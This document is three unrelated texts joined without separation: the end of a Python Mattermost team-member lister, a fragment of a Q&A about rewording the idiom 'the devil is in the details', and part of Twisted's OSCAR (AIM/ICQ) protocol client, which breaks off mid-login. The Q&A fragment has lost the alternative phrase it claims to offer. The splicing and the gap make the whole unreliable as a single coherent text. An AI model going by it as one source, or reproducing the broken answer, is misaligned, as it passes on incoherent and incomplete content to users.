logger.error( 'no team with name %s found' % teamName ) return logger.debug( 'found team %s: %s' % (teamName, self.mmDriver.teams.get_team( teamId )) ) users = self._getAllUsersForTeam( teamId ) logger.debug( 'found %s users for team "%s"' % (len( users ), teamName) ) return users def _getAllUsersForTeam( self, teamId ) : # get all users for a team # with the max of 200 per page, we need to iterate a bit over the pages users = [ ] pgNo = 0 teamUsers = self.mmDriver.users.get_users( params={ 'in_team' : teamId, 'page' : str( pgNo ), 'per_page' : 200, } ) while teamUsers : users += teamUsers pgNo += 1 teamUsers = self.mmDriver.users.get_users( params={ 'in_team' : teamId, 'per_page' : 200, 'page' : str( pgNo ), } ) return users if __name__ == '__main__' : mmM = MattermostManager() mmM.getTeamMembers( 'myTeam' )
Which would be a suitable alternative for the common idiom "The devil is in the details", without the use of the word "devil"? Alternative answers are welcome too! The idiom the devil is in the details means that mistakes are usually made in the small details of a project. Usually it is a caution to pay attention to avoid failure. The devil version of the idiom is a variation on the God phrase, though the exact origin of both is uncertain. would convey what you mean.
# -*- test-case-name: twisted.words.test -*- # Copyright (c) 2001-2008 Twisted Matrix Laboratories. # See LICENSE for details. """ An implementation of the OSCAR protocol, which AIM and ICQ use to communcate. Maintainer: Paul Swartz """ import struct import string import socket import random import types import re from twisted.internet import reactor, defer, protocol from twisted.python import log from twisted.python.hashlib import md5 def logPacketData(data): lines = len(data)/16 if lines*16 != len(data): lines=lines+1 for i in range(lines): d = tuple(data[16*i:16*i+16]) hex = map(lambda x: "%02X"%ord(x),d) text = map(lambda x: (len(repr(x))>3 and '.') or x, d) log.msg(' '.join(hex)+ ' '*3*(16-len(d)) +''.join(text)) log.msg('') def SNAC(fam,sub,id,data,flags=[0,0]): header="!HHBBL" head=struct.pack(header,fam,sub, flags[0],flags[1], id) return head+str(data) def readSNAC(data): header="!HHBBL" head=list(struct.unpack(header,data[:10])) return head+[data[10:]] def TLV(type,value): header="!HH" head=struct.pack(header,type,len(value)) return head+str(value) def readTLVs(data,count=None): header="!HH" dict={} while data and len(dict)!=count: head=struct.unpack(header,data[:4]) dict[head[0]]=data[4:4+head[1]] data=data[4+head[1]:] if not count: return dict return dict,data def encryptPasswordMD5(password,key): m=md5() m.update(key) m.update(md5(password).digest()) m.update("AOL Instant Messenger (SM)") return m.digest() def encryptPasswordICQ(password): key=[0xF3,0x26,0x81,0xC4,0x39,0x86,0xDB,0x92,0x71,0xA3,0xB9,0xE6,0x53,0x7A,0x95,0x7C] bytes=map(ord,password) r="" for i in range(len(bytes)): r=r+chr(bytes[i]^key[i%len(key)]) return r def dehtml(text): text=string.replace(text,"<br>","\n") text=string.replace(text,"<BR>","\n") text=string.replace(text,"<Br>","\n") # XXX make this a regexp text=string.replace(text,"<bR>","\n") text=re.sub('<.*?>','',text) text=string.replace(text,'&gt;','>') text=string.replace(text,'&lt;','<') text=string.replace(text,'&nbsp;',' ') text=string.replace(text,'&#34;','"') text=string.replace(text,'&amp;','&') return text def html(text): text=string.replace(text,'"','&#34;') text=string.replace(text,'&','&amp;') text=string.replace(text,'<','&lt;') text=string.replace(text,'>','&gt;') text=string.replace(text,"\n","<br>") return '<html><body bgcolor="white"><font color="black">%s</font></body></html>'%text class OSCARUser: def __init__(self, name, warn, tlvs): self.name = name self.warning = warn self.flags = [] self.caps = [] for k,v in tlvs.items(): if k == 1: # user flags v=struct.unpack('!H',v)[0] for o, f in [(1,'trial'), (2,'unknown bit 2'), (4,'aol'), (8,'unknown bit 4'), (16,'aim'), (32,'away'), (1024,'activebuddy')]: if v&o: self.flags.append(f) elif k == 2: # member since date self.memberSince = struct.unpack('!L',v)[0] elif k == 3: # on-since self.onSince = struct.unpack('!L',v)[0] elif k == 4: # idle time self.idleTime = struct.unpack('!H',v)[0] elif k == 5: # unknown pass elif k == 6: # icq online status if v[2] == '\x00': self.icqStatus = 'online' elif v[2] == '\x01': self.icqStatus = 'away' elif v[2] == '\x02': self.icqStatus = 'dnd' elif v[2] == '\x04': self.icqStatus = 'out' elif v[2] == '\x10': self.icqStatus = 'busy' else: self.icqStatus = 'unknown' elif k == 10: # icq ip address self.icqIPaddy = socket.inet_ntoa(v) elif k == 12: # icq random stuff self.icqRandom = v elif k == 13: # capabilities caps=[] while v: c=v[:16] if c==CAP_ICON: caps.append("icon") elif c==CAP_IMAGE: caps.append("image") elif c==CAP_VOICE: caps.append("voice") elif 
c==CAP_CHAT: caps.append("chat") elif c==CAP_GET_FILE: caps.append("getfile") elif c==CAP_SEND_FILE: caps.append("sendfile") elif c==CAP_SEND_LIST: caps.append("sendlist") elif c==CAP_GAMES: caps.append("games") else: caps.append(("unknown",c)) v=v[16:] caps.sort() self.caps=caps elif k == 14: pass elif k == 15: # session length (aim) self.sessionLength = struct.unpack('!L',v)[0] elif k == 16: # session length (aol) self.sessionLength = struct.unpack('!L',v)[0] elif k == 30: # no idea pass else: log.msg("unknown tlv for user %s\nt: %s\nv: %s"%(self.name,k,repr(v))) def __str__(self): s = '<OSCARUser %s' % self.name o = [] if self.warning!=0: o.append('warning level %s'%self.warning) if hasattr(self, 'flags'): o.append('flags %s'%self.flags) if hasattr(self, 'sessionLength'): o.append('online for %i minutes' % (self.sessionLength/60,)) if hasattr(self, 'idleTime'): o.append('idle for %i minutes' % self.idleTime) if self.caps: o.append('caps %s'%self.caps) if o: s=s+', '+', '.join(o) s=s+'>' return s class SSIGroup: def __init__(self, name, tlvs = {}): self.name = name #self.tlvs = [] #self.userIDs = [] self.usersToID = {} self.users = [] #if not tlvs.has_key(0xC8): return #buddyIDs = tlvs[0xC8] #while buddyIDs: # bid = struct.unpack('!H',buddyIDs[:2])[0] # buddyIDs = buddyIDs[2:] # self.users.append(bid) def findIDFor(self, user): return self.usersToID[user] def addUser(self, buddyID, user): self.usersToID[user] = buddyID self.users.append(user) user.group = self def oscarRep(self, groupID, buddyID): tlvData = TLV(0xc8, reduce(lambda x,y:x+y, [struct.pack('!H',self.usersToID[x]) for x in self.users])) return struct.pack('!H', len(self.name)) + self.name + \ struct.pack('!HH', groupID, buddyID) + '\000\001' + tlvData class SSIBuddy: def __init__(self, name, tlvs = {}): self.name = name self.tlvs = tlvs for k,v in tlvs.items(): if k == 0x013c: # buddy comment self.buddyComment = v elif k == 0x013d: # buddy alerts actionFlag = ord(v[0]) whenFlag = ord(v[1]) self.alertActions = [] self.alertWhen = [] if actionFlag&1: self.alertActions.append('popup') if actionFlag&2: self.alertActions.append('sound') if whenFlag&1: self.alertWhen.append('online') if whenFlag&2: self.alertWhen.append('unidle') if whenFlag&4: self.alertWhen.append('unaway') elif k == 0x013e: self.alertSound = v def oscarRep(self, groupID, buddyID): tlvData = reduce(lambda x,y: x+y, map(lambda (k,v):TLV(k,v), self.tlvs.items()), '\000\000') return struct.pack('!H', len(self.name)) + self.name + \ struct.pack('!HH', groupID, buddyID) + '\000\000' + tlvData class OscarConnection(protocol.Protocol): def connectionMade(self): self.state="" self.seqnum=0 self.buf='' self.stopKeepAliveID = None self.setKeepAlive(4*60) # 4 minutes def connectionLost(self, reason): log.msg("Connection Lost! %s" % self) self.stopKeepAlive() # def connectionFailed(self): # log.msg("Connection Failed! 
%s" % self) # self.stopKeepAlive() def sendFLAP(self,data,channel = 0x02): header="!cBHH" self.seqnum=(self.seqnum+1)%0xFFFF seqnum=self.seqnum head=struct.pack(header,'*', channel, seqnum, len(data)) self.transport.write(head+str(data)) # if isinstance(self, ChatService): # logPacketData(head+str(data)) def readFlap(self): header="!cBHH" if len(self.buf)<6: return flap=struct.unpack(header,self.buf[:6]) if len(self.buf)<6+flap[3]: return data,self.buf=self.buf[6:6+flap[3]],self.buf[6+flap[3]:] return [flap[1],data] def dataReceived(self,data): # if isinstance(self, ChatService): # logPacketData(data) self.buf=self.buf+data flap=self.readFlap() while flap: func=getattr(self,"oscar_%s"%self.state,None) if not func: log.msg("no func for state: %s" % self.state) state=func(flap) if state: self.state=state flap=self.readFlap() def setKeepAlive(self,t): self.keepAliveDelay=t self.stopKeepAlive() self.stopKeepAliveID = reactor.callLater(t, self.sendKeepAlive) def sendKeepAlive(self): self.sendFLAP("",0x05) self.stopKeepAliveID = reactor.callLater(self.keepAliveDelay, self.sendKeepAlive) def stopKeepAlive(self): if self.stopKeepAliveID: self.stopKeepAliveID.cancel() self.stopKeepAliveID = None def disconnect(self): """ send the disconnect flap, and sever the connection """ self.sendFLAP('', 0x04) def f(reason): pass self.connectionLost = f self.transport.loseConnection() class SNACBased(OscarConnection): snacFamilies = { # family : (version, toolID, toolVersion) } def __init__(self,cookie): self.cookie=cookie self.lastID=0 self.supportedFamilies = () self.requestCallbacks={} # request id:Deferred def sendSNAC(self,fam,sub,data,flags=[0,0]): """ send a snac and wait for the response by returning a Deferred. """ reqid=self.lastID self.lastID=reqid+1 d = defer.Deferred() d.reqid = reqid #d.addErrback(self._ebDeferredError,fam,sub,data) # XXX for testing self.requestCallbacks[reqid] = d self.sendFLAP(SNAC(fam,sub,reqid,data)) return d def _ebDeferredError(self, error, fam, sub, data): log.msg('ERROR IN DEFERRED %s' % error) log.msg('on sending of message, family 0x%02x, subtype 0x%02x' % (fam, sub)) log.msg('data: %s' % repr(data)) def sendSNACnr(self,fam,sub,data,flags=[0,0]): """ send a snac, but don't bother adding a deferred, we don't care. """ self.sendFLAP(SNAC(fam,sub,0x10000*fam+sub,data)) def oscar_(self,data): self.sendFLAP("\000\000\000\001"+TLV(6,self.cookie), 0x01) return "Data" def oscar_Data(self,data): snac=readSNAC(data[1]) if self.requestCallbacks.has_key(snac[4]): d = self.requestCallbacks[snac[4]] del self.requestCallbacks[snac[4]] if snac[1]!=1: d.callback(snac) else: d.errback(snac) return func=getattr(self,'oscar_%02X_%02X'%(snac[0],snac[1]),None) if not func: self.oscar_unknown(snac) else: func(snac[2:]) return "Data" def oscar_unknown(self,snac): log.msg("unknown for %s" % self) log.msg(snac) def oscar_01_03(self, snac): numFamilies = len(snac[3])/2 self.supportedFamilies = struct.unpack("!"+str(numFamilies)+'H', snac[3]) d = '' for fam in self.supportedFamilies: if self.snacFamilies.has_key(fam): d=d+struct.pack('!2H',fam,self.snacFamilies[fam][0]) self.sendSNACnr(0x01,0x17, d) def oscar_01_0A(self,snac): """ change of rate information. 
""" # this can be parsed, maybe we can even work it in pass def oscar_01_18(self,snac): """ host versions, in the same format as we sent """ self.sendSNACnr(0x01,0x06,"") #pass def clientReady(self): """ called when the client is ready to be online """ d = '' for fam in self.supportedFamilies: if self.snacFamilies.has_key(fam): version, toolID, toolVersion = self.snacFamilies[fam] d = d + struct.pack('!4H',fam,version,toolID,toolVersion) self.sendSNACnr(0x01,0x02,d) class BOSConnection(SNACBased): snacFamilies = { 0x01:(3, 0x0110, 0x059b), 0x13:(3, 0x0110, 0x059b), 0x02:(1, 0x0110, 0x059b), 0x03:(1, 0x0110, 0x059b), 0x04:(1, 0x0110, 0x059b), 0x06:(1, 0x0110, 0x059b), 0x08:(1, 0x0104, 0x0001), 0x09:(1, 0x0110, 0x059b), 0x0a:(1, 0x0110, 0x059b), 0x0b:(1, 0x0104, 0x0001), 0x0c:(1, 0x0104, 0x0001) } capabilities = None def __init__(self,username,cookie): SNACBased.__init__(self,cookie) self.username=username self.profile = None self.awayMessage = None self.services = {} if not self.capabilities: self.capabilities = [CAP_CHAT] def parseUser(self,data,count=None): l=ord(data[0]) name=data[1:1+l] warn,foo=struct.unpack("!HH",data[1+l:5+l]) warn=int(warn/10) tlvs=data[5+l:] if count: tlvs,rest = readTLVs(tlvs,foo) else: tlvs,rest = readTLVs(tlvs), None u = OSCARUser(name, warn, tlvs) if rest == None: return u else: return u, rest def oscar_01_05(self, snac, d = None): """ data for a new service connection d might be a deferred to be called back when the service is ready """ tlvs = readTLVs(snac[3][2:]) service = struct.unpack('!H',tlvs[0x0d])[0] ip = tlvs[5] cookie = tlvs[6] #c = serviceClasses[service](self, cookie, d) c = protocol.ClientCreator(reactor, serviceClasses[service], self, cookie, d) def addService(x): self.services[service] = x c.connectTCP(ip, 5190).addCallback(addService) #self.services[service] = c def oscar_01_07(self,snac): """ rate paramaters """ self.sendSNACnr(0x01,0x08,"\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05") # ack self.initDone() self.sendSNACnr(0x13,0x02,'') # SSI rights info self.sendSNACnr(0x02,0x02,'') # location rights info self.sendSNACnr(0x03,0x02,'') # buddy list rights self.sendSNACnr(0x04,0x04,'') # ICBM parms self.sendSNACnr(0x09,0x02,'') # BOS rights def oscar_01_10(self,snac): """ we've been warned """ skip = struct.unpack('!H',snac[3][:2])[0] newLevel = struct.unpack('!H',snac[3][2+skip:4+skip])[0]/10 if len(snac[3])>4+skip: by = self.parseUser(snac[3][4+skip:]) else: by = None self.receiveWarning(newLevel, by) def oscar_01_13(self,snac): """ MOTD """ pass # we don't care for now def oscar_02_03(self, snac): """ location rights response """ tlvs = readTLVs(snac[3]) self.maxProfileLength = tlvs[1] def oscar_03_03(self, snac): """ buddy list rights response """ tlvs = readTLVs(snac[3]) self.maxBuddies = tlvs[1] self.maxWatchers = tlvs[2] def oscar_03_0B(self, snac): """ buddy update """ self.updateBuddy(self.parseUser(snac[3])) def oscar_03_0C(self, snac): """ buddy offline """ self.offlineBuddy(self.parseUser(snac[3])) # def oscar_04_03(self, snac): def oscar_04_05(self, snac): """ ICBM parms response """ self.sendSNACnr(0x04,0x02,'\x00\x00\x00\x00\x00\x0b\x1f@\x03\xe7\x03\xe7\x00\x00\x00\x00') # IM rights def oscar_04_07(self, snac): """ ICBM message (instant message) """ data = snac[3] cookie, data = data[:8], data[8:] channel = struct.unpack('!H',data[:2])[0] data = data[2:] user, data = self.parseUser(data, 1) tlvs = readTLVs(data) if channel == 1: # message flags = [] multiparts = [] for k, v in tlvs.items(): if k == 2: while v: v = v[2:] # skip bad 
data messageLength, charSet, charSubSet = struct.unpack('!3H', v[:6]) messageLength -= 4 message = [v[6:6+messageLength]] if charSet == 0: pass # don't add anything special elif charSet == 2: message.append('unicode') elif charSet == 3: message.append('iso-8859-1') elif charSet == 0xffff: message.append('none') if charSubSet == 0xb: message.append('macintosh') if messageLength > 0: multiparts.append(tuple(message)) v = v[6+messageLength:] elif k == 3: flags.append('acknowledge') elif k == 4: flags.append('auto') elif k == 6: flags.append('offline') elif k == 8: iconLength, foo, iconSum, iconStamp = struct.unpack('!LHHL',v) if iconLength: flags.append('icon') flags.append((iconLength, iconSum, iconStamp)) elif k == 9: flags.append('buddyrequest') elif k == 0xb: # unknown pass elif k == 0x17: flags.append('extradata') flags.append(v) else: log.msg('unknown TLV for incoming IM, %04x, %s' % (k,repr(v))) # unknown tlv for user SNewdorf # t: 29 # v: '\x00\x00\x00\x05\x02\x01\xd2\x04r\x00\x01\x01\x10/\x8c\x8b\x8a\x1e\x94*\xbc\x80}\x8d\xc4;\x1dEM' # XXX what is this? self.receiveMessage(user, multiparts, flags) elif channel == 2: # rondevouz status = struct.unpack('!H',tlvs[5][:2])[0] requestClass = tlvs[5][10:26] moreTLVs = readTLVs(tlvs[5][26:]) if requestClass == CAP_CHAT: # a chat request exchange = struct.unpack('!H',moreTLVs[10001][:2])[0] name = moreTLVs[10001][3:-2] instance = struct.unpack('!H',moreTLVs[10001][-2:])[0] if not self.services.has_key(SERVICE_CHATNAV): self.connectService(SERVICE_CHATNAV,1).addCallback(lambda x: self.services[SERVICE_CHATNAV].getChatInfo(exchange, name, instance).\ addCallback(self._cbGetChatInfoForInvite, user, moreTLVs[12])) else: self.services[SERVICE_CHATNAV].getChatInfo(exchange, name, instance).\ addCallback(self._cbGetChatInfoForInvite, user, moreTLVs[12]) elif requestClass == CAP_SEND_FILE: if moreTLVs.has_key(11): # cancel log.msg('cancelled file request') log.msg(status) return # handle this later name = moreTLVs[10001][9:-7] desc = moreTLVs[12] log.msg('file request from %s, %s, %s' % (user, name, desc)) self.receiveSendFileRequest(user, name, desc, cookie) else: log.msg('unsupported rondevouz: %s' % requestClass) log.msg(repr(moreTLVs)) else: log.msg('unknown channel %02x' % channel) log.msg(tlvs) def _cbGetChatInfoForInvite(self, info, user, message): apply(self.receiveChatInvite, (user,message)+info) def oscar_09_03(self, snac): """ BOS rights response """ tlvs = readTLVs(snac[3]) self.maxPermitList = tlvs[1] self.maxDenyList = tlvs[2] def oscar_0B_02(self, snac): """ stats reporting interval """ self.reportingInterval = struct.unpack('!H',snac[3][:2])[0] def oscar_13_03(self, snac): """ SSI rights response """ #tlvs = readTLVs(snac[3]) pass # we don't know how to parse this # methods to be called by the client, and their support methods def requestSelfInfo(self): """ ask for the OSCARUser for ourselves """ d = defer.Deferred() self.sendSNAC(0x01, 0x0E, '').addCallback(self._cbRequestSelfInfo, d) return d def _cbRequestSelfInfo(self, snac, d): d.callback(self.parseUser(snac[5])) def initSSI(self): """ this sends the rate request for family 0x13 (Server Side Information) so we can then use it """ return self.sendSNAC(0x13, 0x02, '').addCallback(self._cbInitSSI) def _cbInitSSI(self, snac, d): return {} # don't even bother parsing this def requestSSI(self, timestamp = 0, revision = 0): """ request the server side information if the deferred gets None, it means the SSI is the same """ return self.sendSNAC(0x13, 0x05, 
struct.pack('!LH',timestamp,revision)).addCallback(self._cbRequestSSI) def _cbRequestSSI(self, snac, args = ()): if snac[1] == 0x0f: # same SSI as we have return itemdata = snac[5][3:] if args: revision, groups, permit, deny, permitMode, visibility = args else: version, revision = struct.unpack('!BH', snac[5][:3]) groups = {} permit = [] deny = [] permitMode = None visibility = None while len(itemdata)>4: nameLength = struct.unpack('!H', itemdata[:2])[0] name = itemdata[2:2+nameLength] groupID, buddyID, itemType, restLength = \ struct.unpack('!4H', itemdata[2+nameLength:10+nameLength]) tlvs = readTLVs(itemdata[10+nameLength:10+nameLength+restLength]) itemdata = itemdata[10+nameLength+restLength:] if itemType == 0: # buddies groups[groupID].addUser(buddyID, SSIBuddy(name, tlvs)) elif itemType == 1: # group g = SSIGroup(name, tlvs) if groups.has_key(0): groups[0].addUser(groupID, g) groups[groupID] = g elif itemType == 2: # permit permit.append(name) elif itemType == 3: # deny deny.append(name) elif itemType == 4: # permit deny info if not tlvs.has_key(0xcb): continue # this happens with ICQ permitMode = {1:'permitall',2:'denyall',3:'permitsome',4:'denysome',5:'permitbuddies'}[ord(tlvs[0xca])] visibility = {'\xff\xff\xff\xff':'all','\x00\x00\x00\x04':'notaim'}[tlvs[0xcb]] elif itemType == 5: # unknown (perhaps idle data)? pass else: log.msg('%s %s %s %s %s' % (name, groupID, buddyID, itemType, tlvs)) timestamp = struct.unpack('!L',itemdata)[0] if not timestamp: # we've got more packets coming # which means add some deferred stuff d = defer.Deferred() self.requestCallbacks[snac[4]] = d d.addCallback(self._cbRequestSSI, (revision, groups, permit, deny, permitMode, visibility)) return d return (groups[0].users,permit,deny,permitMode,visibility,timestamp,revision) def activateSSI(self): """ active the data stored on the server (use buddy list, permit deny settings, etc.) """ self.sendSNACnr(0x13,0x07,'') def startModifySSI(self): """ tell the OSCAR server to be on the lookout for SSI modifications """ self.sendSNACnr(0x13,0x11,'') def addItemSSI(self, item, groupID = None, buddyID = None): """ add an item to the SSI server. if buddyID == 0, then this should be a group. this gets a callback when it's finished, but you can probably ignore it. """ if groupID is None: if isinstance(item, SSIGroup): groupID = 0 else: groupID = item.group.group.findIDFor(item.group) if buddyID is None: buddyID = item.group.findIDFor(item) return self.sendSNAC(0x13,0x08, item.oscarRep(groupID, buddyID)) def modifyItemSSI(self, item, groupID = None, buddyID = None): if groupID is None: if isinstance(item, SSIGroup): groupID = 0 else: groupID = item.group.group.findIDFor(item.group) if buddyID is None: buddyID = item.group.findIDFor(item) return self.sendSNAC(0x13,0x09, item.oscarRep(groupID, buddyID)) def delItemSSI(self, item, groupID = None, buddyID = None): if groupID is None: if isinstance(item, SSIGroup): groupID = 0 else: groupID = item.group.group.findIDFor(item.group) if buddyID is None: buddyID = item.group.findIDFor(item) return self.sendSNAC(0x13,0x0A, item.oscarRep(groupID, buddyID)) def endModifySSI(self): self.sendSNACnr(0x13,0x12,'') def setProfile(self, profile): """ set the profile. 
send None to not set a profile (different from '' for a blank one) """ self.profile = profile tlvs = '' if self.profile is not None: tlvs = TLV(1,'text/aolrtf; charset="us-ascii"') + \ TLV(2,self.profile) tlvs = tlvs + TLV(5, ''.join(self.capabilities)) self.sendSNACnr(0x02, 0x04, tlvs) def setAway(self, away = None): """ set the away message, or return (if away == None) """ self.awayMessage = away tlvs = TLV(3,'text/aolrtf; charset="us-ascii"') + \ TLV(4,away or '') self.sendSNACnr(0x02, 0x04, tlvs) def setIdleTime(self, idleTime): """ set our idle time. don't call more than once with a non-0 idle time. """ self.sendSNACnr(0x01, 0x11, struct.pack('!L',idleTime)) def sendMessage(self, user, message, wantAck = 0, autoResponse = 0, offline = 0 ): \ #haveIcon = 0, ): """ send a message to user (not an OSCARUseR). message can be a string, or a multipart tuple. if wantAck, we return a Deferred that gets a callback when the message is sent. if autoResponse, this message is an autoResponse, as if from an away message. if offline, this is an offline message (ICQ only, I think) """ data = ''.join([chr(random.randrange(0, 127)) for i in range(8)]) # cookie data = data + '\x00\x01' + chr(len(user)) + user if not type(message) in (types.TupleType, types.ListType): message = [[message,]] if type(message[0][0]) == types.UnicodeType: message[0].append('unicode') messageData = '' for part in message: charSet = 0 if 'unicode' in part[1:]: charSet = 2 part[0] = part[0].encode('utf-8') elif 'iso-8859-1' in part[1:]: charSet = 3 part[0] = part[0].encode('iso-8859-1') elif 'none' in part[1:]: charSet = 0xffff if 'macintosh' in part[1:]: charSubSet = 0xb else: charSubSet = 0 messageData = messageData + '\x01\x01' + \ struct.pack('!3H',len(part[0])+4,charSet,charSubSet) messageData = messageData + part[0] data = data + TLV(2, '\x05\x01\x00\x03\x01\x01\x02'+messageData) if wantAck: data = data + TLV(3,'') if autoResponse: data = data + TLV(4,'') if offline: data = data + TLV(6,'') if wantAck: return self.sendSNAC(0x04, 0x06, data).addCallback(self._cbSendMessageAck, user, message) self.sendSNACnr(0x04, 0x06, data) def _cbSendMessageAck(self, snac, user, message): return user, message def connectService(self, service, wantCallback = 0, extraData = ''): """ connect to another service if wantCallback, we return a Deferred that gets called back when the service is online. if extraData, append that to our request. 
""" if wantCallback: d = defer.Deferred() self.sendSNAC(0x01,0x04,struct.pack('!H',service) + extraData).addCallback(self._cbConnectService, d) return d else: self.sendSNACnr(0x01,0x04,struct.pack('!H',service)) def _cbConnectService(self, snac, d): self.oscar_01_05(snac[2:], d) def createChat(self, shortName): """ create a chat room """ if self.services.has_key(SERVICE_CHATNAV): return self.services[SERVICE_CHATNAV].createChat(shortName) else: return self.connectService(SERVICE_CHATNAV,1).addCallback(lambda s: s.createChat(shortName)) def joinChat(self, exchange, fullName, instance): """ join a chat room """ #d = defer.Deferred() return self.connectService(0x0e, 1, TLV(0x01, struct.pack('!HB',exchange, len(fullName)) + fullName + struct.pack('!H', instance))).addCallback(self._cbJoinChat) #, d) #return d def _cbJoinChat(self, chat): del self.services[SERVICE_CHAT] return chat def warnUser(self, user, anon = 0): return self.sendSNAC(0x04, 0x08, '\x00'+chr(anon)+chr(len(user))+user).addCallback(self._cbWarnUser) def _cbWarnUser(self, snac): oldLevel, newLevel = struct.unpack('!2H', snac[5]) return oldLevel, newLevel def getInfo(self, user): #if user. return self.sendSNAC(0x02, 0x05, '\x00\x01'+chr(len(user))+user).addCallback(self._cbGetInfo) def _cbGetInfo(self, snac): user, rest = self.parseUser(snac[5],1) tlvs = readTLVs(rest) return tlvs.get(0x02,None) def getAway(self, user): return self.sendSNAC(0x02, 0x05, '\x00\x03'+chr(len(user))+user).addCallback(self._cbGetAway) def _cbGetAway(self, snac): user, rest = self.parseUser(snac[5],1) tlvs = readTLVs(rest) return tlvs.get(0x04,None) # return None if there is no away message #def acceptSendFileRequest(self, # methods to be overriden by the client def initDone(self): """ called when we get the rate information, which means we should do other init. stuff. """ log.msg('%s initDone' % self) pass def updateBuddy(self, user): """ called when a buddy changes status, with the OSCARUser for that buddy. """ log.msg('%s updateBuddy %s' % (self, user)) pass def offlineBuddy(self, user): """ called when a buddy goes offline """ log.msg('%s offlineBuddy %s' % (self, user)) pass def receiveMessage(self, user, multiparts, flags): """ called when someone sends us a message """ pass def receiveWarning(self, newLevel, user): """ called when someone warns us. 
user is either None (if it was anonymous) or an OSCARUser """ pass def receiveChatInvite(self, user, message, exchange, fullName, instance, shortName, inviteTime): """ called when someone invites us to a chat room """ pass def chatReceiveMessage(self, chat, user, message): """ called when someone in a chatroom sends us a message in the chat """ pass def chatMemberJoined(self, chat, member): """ called when a member joins the chat """ pass def chatMemberLeft(self, chat, member): """ called when a member leaves the chat """ pass def receiveSendFileRequest(self, user, file, description, cookie): """ called when someone tries to send a file to us """ pass class OSCARService(SNACBased): def __init__(self, bos, cookie, d = None): SNACBased.__init__(self, cookie) self.bos = bos self.d = d def connectionLost(self, reason): for k,v in self.bos.services.items(): if v == self: del self.bos.services[k] return def clientReady(self): SNACBased.clientReady(self) if self.d: self.d.callback(self) self.d = None class ChatNavService(OSCARService): snacFamilies = { 0x01:(3, 0x0010, 0x059b), 0x0d:(1, 0x0010, 0x059b) } def oscar_01_07(self, snac): # rate info self.sendSNACnr(0x01, 0x08, '\000\001\000\002\000\003\000\004\000\005') self.sendSNACnr(0x0d, 0x02, '') def oscar_0D_09(self, snac): self.clientReady() def getChatInfo(self, exchange, name, instance): d = defer.Deferred() self.sendSNAC(0x0d,0x04,struct.pack('!HB',exchange,len(name)) + \ name + struct.pack('!HB',instance,2)). \ addCallback(self._cbGetChatInfo, d) return d def _cbGetChatInfo(self, snac, d): data = snac[5][4:] exchange, length = struct.unpack('!HB',data[:3]) fullName = data[3:3+length] instance = struct.unpack('!H',data[3+length:5+length])[0] tlvs = readTLVs(data[8+length:]) shortName = tlvs[0x6a] inviteTime = struct.unpack('!L',tlvs[0xca])[0] info = (exchange,fullName,instance,shortName,inviteTime) d.callback(info) def createChat(self, shortName): #d = defer.Deferred() data = '\x00\x04\x06create\xff\xff\x01\x00\x03' data = data + TLV(0xd7, 'en') data = data + TLV(0xd6, 'us-ascii') data = data + TLV(0xd3, shortName) return self.sendSNAC(0x0d, 0x08, data).addCallback(self._cbCreateChat) #return d def _cbCreateChat(self, snac): #d): exchange, length = struct.unpack('!HB',snac[5][4:7]) fullName = snac[5][7:7+length] instance = struct.unpack('!H',snac[5][7+length:9+length])[0] #d.callback((exchange, fullName, instance)) return exchange, fullName, instance class ChatService(OSCARService): snacFamilies = { 0x01:(3, 0x0010, 0x059b), 0x0E:(1, 0x0010, 0x059b) } def __init__(self,bos,cookie, d = None): OSCARService.__init__(self,bos,cookie,d) self.exchange = None self.fullName = None self.instance = None self.name = None self.members = None clientReady = SNACBased.clientReady # we'll do our own callback def oscar_01_07(self,snac): self.sendSNAC(0x01,0x08,"\000\001\000\002\000\003\000\004\000\005") self.clientReady() def oscar_0E_02(self, snac): # try: # this is EVIL # data = snac[3][4:] # self.exchange, length = struct.unpack('!HB',data[:3]) # self.fullName = data[3:3+length] # self.instance = struct.unpack('!H',data[3+length:5+length])[0] # tlvs = readTLVs(data[8+length:]) # self.name = tlvs[0xd3] # self.d.callback(self) # except KeyError: data = snac[3] self.exchange, length = struct.unpack('!HB',data[:3]) self.fullName = data[3:3+length] self.instance = struct.unpack('!H',data[3+length:5+length])[0] tlvs = readTLVs(data[8+length:]) self.name = tlvs[0xd3] self.d.callback(self) def oscar_0E_03(self,snac): users=[] rest=snac[3] while rest: user, rest = 
self.bos.parseUser(rest, 1) users.append(user) if not self.fullName: self.members = users else: self.members.append(users[0]) self.bos.chatMemberJoined(self,users[0]) def oscar_0E_04(self,snac): user=self.bos.parseUser(snac[3]) for u in self.members: if u.name == user.name: # same person! self.members.remove(u) self.bos.chatMemberLeft(self,user) def oscar_0E_06(self,snac): data = snac[3] user,rest=self.bos.parseUser(snac[3][14:],1) tlvs = readTLVs(rest[8:]) message=tlvs[1] self.bos.chatReceiveMessage(self,user,message) def sendMessage(self,message): tlvs=TLV(0x02,"us-ascii")+TLV(0x03,"en")+TLV(0x01,message) self.sendSNAC(0x0e,0x05, "\x46\x30\x38\x30\x44\x00\x63\x00\x00\x03\x00\x01\x00\x00\x00\x06\x00\x00\x00\x05"+ struct.pack("!H",len(tlvs))+ tlvs) def leaveChat(self): self.disconnect() class OscarAuthenticator(OscarConnection): BOSClass = BOSConnection def __init__(self,username,password,deferred=None,icq=0): self.username=username self.password=password self.deferred=deferred self.icq=icq # icq mode is disabled #if icq and self.BOSClass==BOSConnection: # self.BOSClass=ICQConnection def oscar_(self,flap): if not self.icq: self.sendFLAP("\000\000\000\001", 0x01) self.sendFLAP(SNAC(0x17,0x06,0, TLV(TLV_USERNAME,self.username)+ TLV(0x004B,''))) self.state="Key" else: encpass=encryptPasswordICQ(self.password) self.sendFLAP('\000\000\000\001'+ TLV(0x01,self.username)+ TLV(0x02,encpass)+ TLV(0x03,'ICQ Inc. - Product of ICQ (TM).2001b.5.18.1.3659.85')+ TLV(0x16,"\x01\x0a")+ TLV(0x17,"\x00\x05")+ TLV(0x18,"\x00\x12")+ TLV(0x19,"\000\001")+ TLV(0x1a,"\x0eK")+ TLV(0x14,"\x00\x00\x00U")+ TLV(0x0f,"en")+ TLV(0x0e,"us"),0x01) self.state="Cookie" def oscar_Key(self,data): snac=readSNAC(data[1]) key=snac[5][2:] encpass=encryptPasswordMD5(self.password,key) self.sendFLAP(SNAC(0x17,0x02,0, TLV(TLV_USERNAME,self.username)+ TLV(TLV_PASSWORD,encpass)+ TLV(0x004C, '')+ # unknown TLV(TLV_CLIENTNAME,"AOL Instant Messenger (SM), version 4.8.2790/WIN32")+ TLV(0x0016,"\x01\x09")+ TLV(TLV_CLIENTMAJOR,"\000\004")+ 